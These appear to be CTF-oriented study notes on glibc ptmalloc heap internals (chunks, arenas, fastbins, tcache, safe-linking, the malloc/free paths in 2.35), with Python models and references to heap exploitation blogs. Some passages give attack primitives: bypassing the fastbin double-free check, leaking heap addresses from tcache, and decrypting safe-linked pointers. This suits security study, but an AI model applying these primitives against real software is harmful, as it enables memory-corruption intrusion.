References

https://ctf-wiki.org/pwn/linux/user-mode/heap/ptmalloc2/introduction/

https://www.cnblogs.com/ve1kcon/p/18071091

https://iyheart.github.io/2024/10/11/CTFblog/PWN%E7%B3%BB%E5%88%97blog/Linux_pwn/2.%E5%A0%86%E7%B3%BB%E5%88%97/PWN%E5%A0%86unlink/index.html

https://eastxuelian.nebuu.la/glibc/glibc-simple

https://www.roderickchan.cn/zh-cn/2023-02-27-house-of-all-about-glibc-heap-exploitation/#21-house-of-spirit

https://zikh26.github.io/posts/501cca6.html

https://zp9080.github.io/post/%E5%A0%86%E6%9D%82%E8%AE%B0/%E9%AB%98%E7%89%88%E6%9C%ACoff-by-null/

https://blog.csdn.net/qq_41683953/article/details/136767925

http://124.220.191.5/2025/09/13/off-by-null/index.html

https://9anux.org/2024/08/06/house%20of%20water%20&%20TFCCTF%202024%20MCGUAVA/

https://zephyr369.online/houseofwater/

https://bbs.kanxue.com/thread-268245.htm

https://enllus1on.github.io/2024/01/22/new-read-write-primitive-in-glibc-2-38/#more%EF%BC%8C%E6%94%B9%E8%BF%9B%E5%90%8E%E5%B0%B1%E4%B8%8D%E9%9C%80%E8%A6%81wide_data%E4%BA%86

https://zp9080.github.io/post/%E5%A0%86%E6%94%BB%E5%87%BBio_file/house-of-apple1/

https://196082.github.io/2022/08/05/house-of-apple2/

https://www.cnblogs.com/mazhatter/p/18475601

https://blog.csome.cc/p/house-of-some/

https://nicholas-wei.github.io/2022/02/07/tcache-stashing-unlink-attack/

https://xz.aliyun.com/spa/#/news/5139

https://blog.csdn.net/qq_45323960/article/details/123810198?ops_request_misc=&request_id=&biz_id=102&utm_term=io_file&utm_medium=distribute.pc_search_result.none-task-blog-2allsobaiduweb~default-1-123810198.142^v102^pc_search_result_base8&spm=1018.2226.3001.4187

https://bbs.kanxue.com/thread-272098.htm

https://bbs.kanxue.com/thread-275968.htm

https://www.cameudis.com/2024/04/18/BlackHatMEA2023-House-of-Minho.html

Heap structure and management

ptmalloc

brk

int brk(void *addr)

Sets the program break (the end of the heap) to addr. Returns 0 on success, -1 on failure.

sbrk

void* sbrk(intptr_t incr)

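The argument is the number of bytes to add to the heap (it may be negative or zero). Returns the previous program break, i.e. the start of the newly added region; sbrk(0) returns the current break.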

mmap

void *mmap(void *addr, size_t length, int prot, int flags, int fd, off_t offset)

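The parameters are:
  • addr: start address of the mapping, usually NULL so that the kernel chooses it.
  • length: length of the mapping.
  • prot: protection of the mapping, a combination of PROT_EXEC, PROT_READ, PROT_WRITE and PROT_NONE.
  • flags: properties of the mapping, such as MAP_SHARED, MAP_PRIVATE and MAP_FIXED (MAP_ANONYMOUS for memory not backed by a file).
  • fd: file descriptor of the file to map, usually returned by open (-1 for anonymous mappings).
  • offset: offset into the file, usually 0 (it must be a multiple of the page size).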

Returns a pointer to the mapped area on success, or MAP_FAILED on failure.

munmap

int munmap(void *addr, size_t length)

addr is the address returned by mmap; length is the size of the mapping.

Returns 0 on success, -1 on failure.

Memory obtained through mmap() and through brk()/sbrk() is managed independently. The two cover different regions, and mmap does not move the program break.
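Python's standard mmap module wraps the same system call. The following is a minimal sketch that assumes Linux, where mmap.MAP_ANONYMOUS is available. It creates an anonymous private mapping of the kind malloc uses for very large requests, writes to it, reads the data back, and unmaps it.

```python
import mmap


def anon_mapping_roundtrip(data: bytes) -> bytes:
    """Map one anonymous page, write `data`, read it back, then unmap it."""
    # fileno=-1 plus MAP_ANONYMOUS: the pages are not backed by a file
    # and start out zero-filled.
    m = mmap.mmap(-1, mmap.PAGESIZE,
                  flags=mmap.MAP_PRIVATE | mmap.MAP_ANONYMOUS,
                  prot=mmap.PROT_READ | mmap.PROT_WRITE)
    try:
        m[:len(data)] = data        # write into the mapping
        return m[:len(data)]        # read the same bytes back
    finally:
        m.close()                   # unmaps the region


if __name__ == "__main__":
    print(anon_mapping_roundtrip(b"heap"))
```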

chunk

struct malloc_chunk {    
INTERNAL_SIZE_T prev_size; /* Size of previous chunk (if free). */
INTERNAL_SIZE_T size; /* Size in bytes, including overhead. */

struct malloc_chunk* fd; /* double links -- used only if free. */
struct malloc_chunk* bk;

/* Only used for large blocks: pointer to next larger size. */
struct malloc_chunk* fd_nextsize; /* double links -- used only if free. */
struct malloc_chunk* bk_nextsize;
};

The fields of the chunk structure are explained below:

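  • prev_size: if the physically preceding chunk is free, this field holds that chunk's size, header included. The physically preceding chunk is the one at the lower address, and the difference between the two chunk addresses equals its size. If the preceding chunk is not free, this field can hold that chunk's user data.
  • size: the size of this chunk, which must be a multiple of MALLOC_ALIGNMENT. A request that is not a multiple is rounded up to the smallest suitable multiple by the request2size() macro. MALLOC_ALIGNMENT is 2 * SIZE_SZ, which is 16 on 64-bit systems and 8 on most 32-bit systems (i386 uses 16).
    • The low three bits of this field do not count toward the size. From high to low they are:
    • NON_MAIN_ARENA (A, 0x4): records whether the chunk belongs to a non-main arena. 1 means it does not belong to the main arena; 0 means it does.
    • IS_MMAPPED (M, 0x2): records whether the chunk was allocated by mmap. M=1 means it came from an mmap region; M=0 means it came from the heap region.
    • PREV_INUSE (P, 0x1): records whether the previous chunk is allocated.
      • The P bit of the first chunk allocated in the heap is always set to 1.
      • P=1 means the previous chunk is in use, and prev_size is not meaningful.
      • When P is 0, prev_size gives the size, and therefore the address, of the previous chunk.
  • fd, bk: while the chunk is allocated, user data starts at fd. When the chunk is free, it is added to the matching free list, and the fields mean:
    • fd points to the next (logically adjacent, see below) free chunk.
    • bk points to the previous (logically adjacent) free chunk.
    • fd and bk link free chunks into lists so that they can be managed together.
  • fd_nextsize, bk_nextsize: also used only when the chunk is free, and only for large chunks.
    • fd_nextsize points to the first free chunk of the next different size (the next smaller size in fd order). The bin header is not included.
    • bk_nextsize points to the first free chunk of the previous different size (the next larger size). The bin header is not included.
    • Free large chunks are kept in decreasing size order along fd, so malloc can find a suitable chunk without visiting every chunk.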

When prev_size and size are discussed, the "previous" ("next") chunk usually means the physically adjacent chunk at the lower (higher) address.

When fd and bk are discussed, the "previous" ("next") chunk usually means the neighbor toward the head (tail) of the bin list.

// pointer to the user data of chunk p
#define chunk2mem(p) ((void*)((char*)(p) + 2 * sizeof(size_t)))

// chunk pointer from a user data pointer
#define mem2chunk(mem) ((mchunkptr)((char*)(mem) - 2 * sizeof(size_t)))

// pointer to the physically next chunk (the A/M/P flag bits are masked off)
#define next_chunk(p) ((mchunkptr)((char*)(p) + ((p)->size & ~0x7)))

The first two fields, prev_size and size, are called the chunk header, and the rest is the user data. The pointer returned by malloc points to the start of the user data.
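The size arithmetic above can be checked with a few helpers. This is a sketch that assumes a 64-bit build (SIZE_SZ = 8, MALLOC_ALIGNMENT = 16, MINSIZE = 0x20). The helper names mirror the glibc macros, but they are written here for illustration and are not glibc's code.

```python
SIZE_SZ = 8                          # 64-bit
MALLOC_ALIGNMENT = 2 * SIZE_SZ       # 16
MALLOC_ALIGN_MASK = MALLOC_ALIGNMENT - 1
MINSIZE = 0x20

PREV_INUSE, IS_MMAPPED, NON_MAIN_ARENA = 0x1, 0x2, 0x4
SIZE_BITS = PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA


def request2size(req: int) -> int:
    """Chunk size used for malloc(req): SIZE_SZ overhead, rounded up to 16."""
    if req + SIZE_SZ + MALLOC_ALIGN_MASK < MINSIZE:
        return MINSIZE
    return (req + SIZE_SZ + MALLOC_ALIGN_MASK) & ~MALLOC_ALIGN_MASK


def decode_size(field: int):
    """Split a raw size field into (size, A, M, P)."""
    return (field & ~SIZE_BITS,
            bool(field & NON_MAIN_ARENA),
            bool(field & IS_MMAPPED),
            bool(field & PREV_INUSE))


def chunk2mem(p: int) -> int:
    return p + 2 * SIZE_SZ           # skip prev_size and size


def mem2chunk(mem: int) -> int:
    return mem - 2 * SIZE_SZ


def next_chunk(p: int, size_field: int) -> int:
    return p + (size_field & ~SIZE_BITS)
```

For example, request2size(0x18) is 0x20, and decode_size(0x421) gives (0x420, False, False, True).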

malloc_state

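In a multithreaded program, if every thread allocated memory from the same place, contention for the allocator would be heavy and performance would be poor. ptmalloc therefore introduces arenas. Threads are spread across several arenas, which reduces contention.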

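There is a single main_arena, which manages the brk heap. The other arenas (non-main arenas) manage heaps created with mmap. All arenas are linked into a list through their next field.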

The malloc_state of main_arena is not part of the heap segment. It is a global variable stored in the data segment of libc.so.

struct malloc_state { 
/* Serialize access. */
__libc_lock_define(, mutex);
/* Flags (formerly in max_fast). */
int flags;
int have_fastchunks;
/* Fastbins */
mfastbinptr fastbinsY[ NFASTBINS ]; // fastbinY[10]
/* Base of the topmost chunk -- not otherwise kept in a bin */
mchunkptr top;
/* The remainder from the most recent split of a small request */
mchunkptr last_remainder;
/* Normal bins packed as described above */
mchunkptr bins[ NBINS * 2 - 2 ]; // bins[254]
/* Bitmap of bins, help to speed up the process of determinating if a given bin is definitely empty.*/
unsigned int binmap[ BINMAPSIZE ];
/* Linked list, points to the next arena */
struct malloc_state *next;
/* Linked list for free arenas. Access to this field is serialized by free_list_lock in arena.c. */
struct malloc_state *next_free;
/* Number of threads attached to this arena. 0 if the arena is on the free list. Access to this field is serialized by free_list_lock in arena.c. */
INTERNAL_SIZE_T attached_threads;
/* Memory allocated from the system in this arena. */
INTERNAL_SIZE_T system_mem;
INTERNAL_SIZE_T max_system_mem;
};
bins[] index  bin / pointer      chunk size
0             unsorted bin fd
1             unsorted bin bk
2             small bin fd       0x20
3             small bin bk       0x20
4             small bin fd       0x30
5             small bin bk       0x30
...
124           small bin fd       0x3f0
125           small bin bk       0x3f0
126           large bin fd       0x400~0x430
127           large bin bk       0x400~0x430
...
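The table can be reproduced from the index macros. The following is a sketch of glibc's smallbin_index and largebin_index_64 for 64-bit, re-expressed in Python as an assumption to verify against the malloc.c of the target version. bins_slots is a hypothetical helper that gives the two bins[] entries of bin i (bin 1 is the unsorted bin).

```python
MIN_LARGE_SIZE = 0x400          # 64-bit: 64 small bins * 16 bytes


def smallbin_index(sz: int) -> int:
    return sz >> 4               # one bin per 16-byte size on 64-bit


def largebin_index_64(sz: int) -> int:
    if (sz >> 6) <= 48:
        return 48 + (sz >> 6)    # 64-byte spacing
    if (sz >> 9) <= 20:
        return 91 + (sz >> 9)    # 512-byte spacing
    if (sz >> 12) <= 10:
        return 110 + (sz >> 12)  # 4 KiB spacing
    if (sz >> 15) <= 4:
        return 119 + (sz >> 15)  # 32 KiB spacing
    if (sz >> 18) <= 2:
        return 124 + (sz >> 18)  # 256 KiB spacing
    return 126                   # everything larger


def bin_index(sz: int) -> int:
    return smallbin_index(sz) if sz < MIN_LARGE_SIZE else largebin_index_64(sz)


def bins_slots(i: int):
    """Positions of bin i's fd and bk inside malloc_state.bins[]."""
    return 2 * (i - 1), 2 * (i - 1) + 1
```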

top chunk

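  • On the first call to malloc, memory is requested from the system and placed in the top chunk. av->top points to the top chunk's header (its prev_size field), and a chunk is then split off the top chunk.
  • On later calls, malloc first checks whether any bin holds a suitable free chunk. If none does, it splits a chunk off the top chunk and updates main_arena's top pointer.
  • If the requested chunk is larger than the top chunk, sysmalloc requests more memory through a system call. It either extends the top chunk with brk or, for requests above the mmap threshold, maps the chunk directly with mmap.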
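Splitting the top chunk can be sketched as follows, assuming a 64-bit build. split_top is a hypothetical helper that models the end of _int_malloc. It includes the top-size sanity check that glibc added in 2.29, and the split condition that the top chunk must hold at least nb + MINSIZE.

```python
MINSIZE = 0x20
PREV_INUSE = 0x1


def split_top(top: int, top_size: int, nb: int, system_mem: int):
    """Return (victim, new_top, new_top_size_field), or None for sysmalloc."""
    if top_size > system_mem:                    # glibc >= 2.29 check
        raise RuntimeError("malloc(): corrupted top size")
    if top_size >= nb + MINSIZE:                 # remainder stays usable
        new_top = top + nb
        return top, new_top, (top_size - nb) | PREV_INUSE
    return None                                  # extend via brk/mmap
```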

bins

A bin is a linked list of free chunks (struct malloc_chunk). A simplified model:

#include <stddef.h>

// Simplified model, not glibc's real layout (real bins are circular lists headed in bins[])
typedef struct malloc_chunk {
size_t prev_size;            // size of the previous chunk (if free)
size_t size;                 // size of this chunk
struct malloc_chunk* fd;     // forward pointer
struct malloc_chunk* bk;     // backward pointer
} malloc_chunk;

typedef malloc_chunk* mchunkptr;
typedef malloc_chunk* mfastbinptr;

// Simplified allocator state
typedef struct malloc_state {
mfastbinptr fastbinsY[10];   // fast bins, simplified to 10 entries
mchunkptr unsorted_bin;      // head of the unsorted bin
mchunkptr smallbins[64];     // small bins, simplified to 64 entries
mchunkptr largebins[64];     // large bins, simplified to 64 entries
// other bookkeeping omitted
} mstate;

// Initialize a malloc_state: every bin starts empty
void init_malloc_state(mstate* state) {
for (int i = 0; i < 10; ++i) {
state->fastbinsY[i] = NULL;
}
state->unsorted_bin = NULL;
for (int i = 0; i < 64; ++i) {
state->smallbins[i] = NULL;
state->largebins[i] = NULL;
}
}

fastbin

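  • Size: 0x20~0x80 including the header (the upper limit is global_max_fast)
  • Count: 10 lists (NFASTBINS); with the default global_max_fast, only the 7 lists for 0x20~0x80 are used
  • Singly linked through fd. Insertion and removal both happen at the head (LIFO)
  • The PREV_INUSE bit of the chunk that follows a fastbin chunk stays set. Fastbin chunks therefore still look in use and are not coalesced, which keeps allocation fast
  • On free, only the chunk at the head of the list is compared with the chunk being freed. A double free is therefore detected only when the same chunk is freed twice in a row ("double free or corruption (fasttop)")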
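The LIFO behavior and the head-only double-free check can be shown with a toy list model. This is a sketch, not glibc code. Each fastbin is a Python list with the head at index 0, and fastbin_index assumes 64-bit.

```python
def fastbin_index(sz: int) -> int:
    return (sz >> 4) - 2          # 0x20 -> 0, ..., 0x80 -> 6 on 64-bit


class FastbinModel:
    """Toy model of fastbinsY[]: each bin is a list, head at index 0."""

    def __init__(self):
        self.bins = [[] for _ in range(10)]

    def free(self, chunk: int, size: int) -> None:
        b = self.bins[fastbin_index(size)]
        # _int_free only compares against the current head ("fasttop")
        if b and b[0] == chunk:
            raise RuntimeError("double free or corruption (fasttop)")
        b.insert(0, chunk)        # LIFO: push at the head

    def malloc(self, size: int):
        b = self.bins[fastbin_index(size)]
        return b.pop(0) if b else None   # pop from the head
```

Freeing A, B, A is accepted because A is not the head when it is freed the second time. Freeing A again right afterwards is caught.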

unsortedbin

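  • Size: unlimited
  • Count: 1 list
  • Doubly linked; chunks are inserted at the head and taken from the tail
  • A freed chunk that goes into neither tcache nor a fastbin is placed in the unsorted bin first. So is any chunk produced by consolidating fastbin chunks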

smallbin

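  • Size: smaller than 0x400
  • Count: 62
  • Doubly linked, FIFO: inserted at the head, taken from the tail
  • How a chunk gets into a smallbin
    • Its size is in range
    • Free it into the unsorted bin, then request a size that is in neither the unsorted bin nor a smallbin. While malloc sorts the unsorted bin, the chunk freed earlier is moved into its smallbin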

largebin

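  • Size: 0x400 and above
  • Count: 63
  • Linked through fd/bk like the other bins, and additionally through fd_nextsize and bk_nextsize
  • Chunks in the same large bin may have different sizes
  • Large chunks can be inserted into or removed from any position in a large bin
  • Chunks in one large bin are sorted by decreasing size: the largest chunk is at the head and the smallest at the tail. A chunk whose size is already present is inserted right after the first chunk of that size
  • Allocation first compares the request with the size of the first (largest) chunk. If that chunk is large enough, malloc walks the bin from the smallest chunk upward and takes the first chunk whose size equals or is just above the request. If that chunk is larger than the request, it is split in two: the first part is returned with exactly the requested size, and the remainder becomes a new chunk in the unsorted bin. If the remainder would be smaller than MINSIZE, the whole chunk is returned instead
  • If the largest chunk in the large bin is smaller than the request, malloc uses binmap to find the next non-empty bin and allocates from it in the same way. If there is none, the top chunk is used
  • free works as it does for smallbins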
Group  Count  Spacing (bytes)
1      32     64
2      16     512
3      8      4096
4      4      32768
5      2      262144
6      1      unlimited
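The sorted insertion into one large bin, and the nextsize list that holds only the first chunk of each size, can be sketched with a list model. This is a simplification. glibc walks the size groups through fd_nextsize, while this model scans the whole list, but both reach the same position. The sizes in the usage example all fall into the first large bin (0x400~0x430).

```python
def largebin_insert(bin_chunks, name, size):
    """Insert (size, name) into a list kept in fd order (largest first)."""
    if not bin_chunks or size < bin_chunks[-1][0]:
        bin_chunks.append((size, name))          # empty bin or new smallest
        return
    i = 0
    while size < bin_chunks[i][0]:               # first size <= ours
        i += 1
    if size == bin_chunks[i][0]:
        bin_chunks.insert(i + 1, (size, name))   # second slot of that size
    else:
        bin_chunks.insert(i, (size, name))       # starts a new size group


def nextsize_heads(bin_chunks):
    """Chunks that are linked through fd_nextsize/bk_nextsize."""
    heads, last = [], None
    for size, name in bin_chunks:
        if size != last:
            heads.append(name)
            last = size
    return heads
```

Inserting A (0x410), B (0x430), C (0x410) and D (0x400) yields the fd order B, A, C, D. Only B, A and D are on the nextsize list.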

tcache

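  • Size: chunk sizes 0x20~0x410 (64 bins; requests up to 0x408)

  • LIFO like fastbins, with head insertion

  • When freeing a chunk whose size is in tcache range

    • It goes into the matching tcache bin first, until that bin is full (7 chunks by default)
    • Once the bin is full, the chunk goes to a fastbin or the unsorted bin
    • Chunks in tcache are not coalesced (their inuse bit is not cleared)
  • When allocating a size in tcache range

    • Chunks are taken from tcache first. The other bins are searched only when the tcache bin is empty
    • If the tcache bin is empty and a fastbin or smallbin holds chunks of that size, malloc returns one of them and moves the remaining chunks of that bin into tcache until it is full. Later requests are then served from tcache. As a result, chunks end up in tcache in the reverse of their order in the bin

  • tcache entries point directly to the user data, whereas the other bins point to the chunk header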
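The order reversal described above can be seen in a toy model of the fastbin path. This is a sketch, not glibc code. fastbin and tcache_bin are plain lists with the head at index 0, and the 7-entry limit is the default tcache_count.

```python
TCACHE_FILL_COUNT = 7            # default mp_.tcache_count


def malloc_from_fastbin_with_stash(fastbin, tcache_bin):
    """Take the fastbin head for the caller, then stash the rest into tcache."""
    victim = fastbin.pop(0)
    while fastbin and len(tcache_bin) < TCACHE_FILL_COUNT:
        tc_victim = fastbin.pop(0)          # next fastbin head
        tcache_bin.insert(0, tc_victim)     # tcache_put pushes at the head
    return victim
```

With a fastbin of A, B, C, D, the caller receives A and the tcache bin becomes D, C, B.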

    /* There is one of these per thread, hence "perthread". Keeping its overall size small matters. */
    // TCACHE_MAX_BINS defaults to 64

    // In glibc 2.26~2.29 each counts[] entry is 1 byte, so tcache_perthread_struct is 1*64 + 8*64 = 0x240 bytes, i.e. a 0x250 chunk with the header
    typedef struct tcache_entry
    {
    struct tcache_entry *next;
    } tcache_entry;

    typedef struct tcache_perthread_struct
    {
    char counts[TCACHE_MAX_BINS];
    tcache_entry *entries[TCACHE_MAX_BINS];
    } tcache_perthread_struct;

    // glibc 2.29+ adds key. Up to 2.33 it holds the address of tcache_perthread_struct; from 2.34 it holds a random value (check with p/x tcache_key). It is set when a chunk enters tcache and cleared when the chunk leaves
    typedef struct tcache_entry
    {
    struct tcache_entry *next;
    struct tcache_perthread_struct *key;
    }tcache_entry;

    typedef struct tcache_perthread_struct
    {
    char counts[TCACHE_MAX_BINS];
    tcache_entry *entries[TCACHE_MAX_BINS];
    } tcache_perthread_struct;

    // In glibc 2.30+ each counts[] entry is 2 bytes, so the struct is 2*64 + 8*64 = 0x280 bytes, i.e. a 0x290 chunk with the header

    typedef struct tcache_entry
    {
    struct tcache_entry *next;
    struct tcache_perthread_struct *key;
    }tcache_entry;

    typedef struct tcache_perthread_struct
    {
    uint16_t counts[TCACHE_MAX_BINS];
    tcache_entry *entries[TCACHE_MAX_BINS];
    } tcache_perthread_struct;

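    // glibc 2.32 introduced PROTECT_PTR (safe-linking). Stored pointers are XOR-mangled, so a leaked pointer cannot be decoded without knowing something about the heap addresses. The functions below come from a newer glibc: they use the 2.34+ tcache_key, and tcache_get_n replaces tcache_get in releases newer than 2.35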

    static __always_inline void
    tcache_put (mchunkptr chunk, size_t tc_idx)
    {
    tcache_entry *e = (tcache_entry *) chunk2mem (chunk);

    /* Mark this chunk as "in the tcache" so the test in _int_free will
    detect a double free. */
    e->key = tcache_key;

    e->next = PROTECT_PTR (&e->next, tcache->entries[tc_idx]);
    tcache->entries[tc_idx] = e;
    ++(tcache->counts[tc_idx]);
    }

    /* Caller must ensure that we know tc_idx is valid and there's
    available chunks to remove. Removes chunk from the middle of the
    list. */
    static __always_inline void *
    tcache_get_n (size_t tc_idx, tcache_entry **ep)
    {
    tcache_entry *e;
    if (ep == &(tcache->entries[tc_idx]))
    e = *ep;
    else
    e = REVEAL_PTR (*ep);

    if (__glibc_unlikely (!aligned_OK (e)))
    malloc_printerr ("malloc(): unaligned tcache chunk detected");

    if (ep == &(tcache->entries[tc_idx]))
    *ep = REVEAL_PTR (e->next);
    else
    *ep = PROTECT_PTR (ep, REVEAL_PTR (e->next));

    --(tcache->counts[tc_idx]);
    e->key = 0;
    return (void *) e;
    }
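The tcache index and struct-size arithmetic from the comments above can be checked as follows. This is a sketch that assumes a 64-bit build and 64 bins. csize2tidx and tidx2usize mirror the glibc macro names, and perthread_chunk_size is a hypothetical helper.

```python
SIZE_SZ = 8
MALLOC_ALIGNMENT = 16
MINSIZE = 0x20
TCACHE_MAX_BINS = 64


def request2size(req: int) -> int:
    if req + SIZE_SZ + MALLOC_ALIGNMENT - 1 < MINSIZE:
        return MINSIZE
    return (req + SIZE_SZ + MALLOC_ALIGNMENT - 1) & ~(MALLOC_ALIGNMENT - 1)


def csize2tidx(chunk_size: int) -> int:
    return (chunk_size - MINSIZE + MALLOC_ALIGNMENT - 1) // MALLOC_ALIGNMENT


def tidx2usize(idx: int) -> int:
    """Largest request size served by tcache bin idx."""
    return idx * MALLOC_ALIGNMENT + MINSIZE - SIZE_SZ


def perthread_chunk_size(count_bytes: int) -> int:
    """Chunk size of tcache_perthread_struct: counts[] plus entries[]."""
    body = count_bytes * TCACHE_MAX_BINS + 8 * TCACHE_MAX_BINS
    return request2size(body)
```

With 1-byte counts this gives the 0x250 chunk of glibc 2.26~2.29. With 2-byte counts it gives the 0x290 chunk of 2.30+.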

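When a chunk is put into an empty tcache bin, its next pointer becomes PROTECT_PTR(&e->next, NULL) = (&e->next >> 12) ^ 0. It is effectively unencrypted: reading it gives the chunk address shifted right by 12 bits, which is an easy heap address leak.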

#define PROTECT_PTR(pos, ptr) \
((__typeof (ptr)) ((((size_t) pos) >> 12) ^ ((size_t) ptr)))
#define REVEAL_PTR(ptr) PROTECT_PTR (&ptr, ptr)
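The two macros can be mirrored in Python to encode a poisoned pointer or decode a leak when the storage address is known. In this sketch, pos is the address at which the pointer is stored (for tcache, the chunk's user pointer). heap_page_from_first_entry is a hypothetical helper for the leak described above.

```python
def protect_ptr(pos: int, ptr: int) -> int:
    """PROTECT_PTR: mangle ptr with the address it is stored at."""
    return (pos >> 12) ^ ptr


def reveal_ptr(pos: int, stored: int) -> int:
    """REVEAL_PTR: XOR is its own inverse."""
    return (pos >> 12) ^ stored


def heap_page_from_first_entry(stored: int) -> int:
    """First chunk in an empty bin stores protect_ptr(pos, 0) == pos >> 12."""
    return stored << 12
```

For a pointer 0x5555555592a0 stored on page 0x555555559000, protect_ptr gives 0x55500000c7f9, which is the ciphertext used in the how2heap example below.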

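The routine from how2heap that decrypts the fd pointer of the second chunk freed into a tcache bin. It does not need a heap leak because the pointer and the address where it is stored share their high bits: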

long decrypt(long cipher)
{
    puts("The decryption uses the fact that the first 12bit of the plaintext (the fwd pointer) is known,");
    puts("because of the 12bit sliding.");
    puts("And the key, the ASLR value, is the same with the leading bits of the plaintext (the fwd pointer)");
    long key = 0;
    long plain;
    for(int i=1; i<6; i++) {
        int bits = 64-12*i;
        if(bits < 0) bits = 0;
        plain = ((cipher ^ key) >> bits) << bits;
        key = plain >> 12;
        printf("round %d:\n", i);
        printf("key:    %#016lx\n", key);
        printf("plain:  %#016lx\n", plain);
        printf("cipher: %#016lx\n\n", cipher);
    }
    return plain;
}

The same routine in Python:

def decrypt(cipher):
    key = 0
    plain = 0
    for i in range(1, 6):
        bits = 64 - 12 * i
        if bits < 0:
            bits = 0
        plain = ((cipher ^ key) >> bits) << bits
        key = plain >> 12
        #print(f"round {i}:")
        #print(f"key:    0x{key:016x}")
        #print(f"plain:  0x{plain:016x}")
        #print(f"cipher: 0x{cipher:016x}\n")
    return plain

if __name__ == "__main__":
    b = 0x55500000c7f9
    plaintext = decrypt(b)
    print(f"recovered value: 0x{plaintext:016x}")
   
#recovered value: 0x00005555555592a0

Heap initialization and management flow

We analyze malloc management in glibc 2.35 in detail and then describe how other versions differ.

2.35

malloc
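  • malloc() -> __libc_malloc() -> _int_malloc()

  • __malloc_initialized tells whether ptmalloc_init has already run

    • If it has not, malloc initializes:
    • tcache_key is initialized
    • malloc_init_state uses bin_at (av, i) to visit every bin (1 to 127) and points each bin's fd and bk at the bin itself, forming empty circular lists
  • checked_request2size converts the requested size into the actual chunk size

  • csize2tidx converts the size into a tcache index, and MAYBE_INIT_TCACHE checks whether tcache has been initialized

    • If it has not, it is initialized

    • _int_malloc allocates a chunk to hold tcache_perthread_struct

  • Check whether the tcache bin has a free chunk and whether tcache may serve this request

    • If so, tcache_get returns a chunk:
    • it checks that tcache->entries[tc_idx] is properly aligned
    • tcache->entries[tc_idx] = REVEAL_PTR (e->next) stores the decrypted pointer to the next chunk in tcache_perthread_struct
    • --(tcache->counts[tc_idx])
    • it clears the chunk's tcache_key and returns the chunk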
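  • Enter _int_malloc

  • First try the fastbins

    • get_max_fast() assumes global_max_fast <= MAX_FAST_SIZE. If the chunk size is not larger than global_max_fast, the fastbin path is taken

    • If the fastbin for that index is non-empty, check that its head chunk is aligned

    • *fb = REVEAL_PTR (victim->fd) updates the fastbin head in main_arena

    • Check that the fastbin index computed from the victim's size equals the index of the current list ("malloc(): memory corruption (fast)")

    • Then, while the tcache bin of that size has room and the fastbin still has chunks:

      • *fb = REVEAL_PTR (victim->fd) updates the fastbin head in main_arena
      • tcache_put moves the chunk into tcache, setting tcache_key and encrypting next
      • repeat
  • Then try the smallbins (below 0x400)

    • Take the chunk at the tail of the bin as victim
    • Check that (victim->bk)->fd == victim
    • Set victim's inuse bit and unlink it
    • Then, while the tcache bin of that size has room and the smallbin still has chunks:
      • bck = tc_victim->bk; bin->bk = bck; bck->fd = bin updates the smallbin list, and the inuse bit is set in the same way
      • tcache_put moves the chunk into tcache, setting tcache_key and encrypting next
      • repeat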
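  • If the request is in largebin range and the fastbins are non-empty, malloc_consolidate moves the fastbin chunks into the unsorted bin

    • check alignment

    • check that the size of each fastbin chunk matches the list it is on

    • do_check_inuse_chunk (check_inuse_chunk; only active in builds with MALLOC_DEBUG)

      • do_check_chunk derives max_address and min_address from top and system_mem in main_arena. For a chunk not allocated by mmap: if it is the top chunk, assert that its size is at least MINSIZE and that PREV_INUSE is set; otherwise assert that it lies between min_address and max_address
      • assert that the next chunk has PREV_INUSE set (i.e. the current chunk is in use)
      • use the current chunk's PREV_INUSE bit to see whether the previous chunk is in use. If it is not, check that the previous chunk's size matches the current prev_size, and run do_check_free_chunk on the previous chunk
        • this asserts that the chunk is not in use, not mmapped, at least MINSIZE and aligned; that its size equals the next chunk's prev_size; that the chunk before it is in use; that the chunk after it is top or in use; and that its fd/bk links are consistent
      • if the next chunk is the top chunk, assert that its size is at least MINSIZE and that PREV_INUSE is set; otherwise, if the next chunk is free, run do_check_free_chunk on it
    • compute the next chunk's position from the current chunk's address and size, and read the next chunk's size

    • if the current chunk's PREV_INUSE bit is clear, locate the previous chunk via prev_size, check that its size equals prev_size ("corrupted size vs. prev_size in fastbins"), and unlink it

    • if the next chunk is not the top chunk

      • use the PREV_INUSE bit of the chunk after it to decide whether the next chunk is in use
        • if the next chunk is in use, clear its PREV_INUSE bit
        • otherwise merge with it, unlinking it
      • if the merged size is in largebin range, set fd_nextsize and bk_nextsize to NULL
      • insert the merged chunk at the head of the unsorted bin, and set its size field and the prev_size of the physically following chunk
    • if the next chunk is the top chunk, merge the current chunk into the top chunk

    • repeat for every free chunk on every fastbin list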

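  • Walk the unsorted bin from tail to head

    • Checks: the sizes of the current chunk and of its physically next chunk are greater than 2*SIZE_SZ and not greater than system_mem; the next chunk's prev_size equals the current size; the next chunk's PREV_INUSE bit is clear; and on the unsorted list, the current chunk's bk->fd is the current chunk
    • If the request is in smallbin range, the unsorted bin holds exactly one chunk, that chunk is last_remainder, and its size is greater than nb + MINSIZE (so the remainder is still usable), the chunk is split directly. The remainder stays in the unsorted bin, and if it is not in smallbin range, its fd_nextsize and bk_nextsize are cleared
    • Otherwise malloc keeps sorting chunks from the tail, putting each one into its smallbin or largebin by size, until it meets a chunk whose size equals nb or the list is empty
      • smallbin chunks are inserted at the head
      • largebin chunks are inserted as follows. If the bin is empty, victim->fd_nextsize = victim->bk_nextsize = victim. If the chunk is smaller than the last (smallest) chunk in the bin, it is appended at the tail: its fd_nextsize is set to the first chunk in the bin, and its bk_nextsize to the first chunk's bk_nextsize. Then the first chunk's bk_nextsize->fd_nextsize and the first chunk's bk_nextsize are both set to victim. This builds the second (nextsize) list, which holds only the first chunk of each size so that sizes can be found quickly. Otherwise malloc follows fd_nextsize to the first chunk whose size is not larger than the current chunk's size. If the sizes are equal, the chunk is inserted in the second position of that size group. If the current chunk is larger, it is inserted before that chunk and also into the nextsize list. Both lists must be intact: fwd->bk_nextsize->fd_nextsize == fwd && bck->fd == fwd
      • when the unsorted bin holds several chunks, chunks are not split directly inside it
      • only a single chunk (the last_remainder case above) is split directly
  • Search the largebins on a smallest-first, best-fit basis for a suitable chunk, split off a chunk of the needed size, and link the rest into the unsorted bin

  • Try to allocate the chunk from the top chunk

    • check that the top chunk's size does not exceed av->system_mem ("malloc(): corrupted top size")
    • if the top chunk's size is at least nb + MINSIZE, split a chunk off it
  • If this still fails, fall through to sysmalloc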

free
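  • If the address passed to free is 0, return immediately
  • Convert the address into a chunk pointer
  • If the chunk was allocated by mmap, handle it separately: munmap_chunk() releases it
  • Get the chunk's arena and call _int_free(arena_ptr, chunk_addr, 0). The last argument, have_lock, tells whether the arena lock is already held
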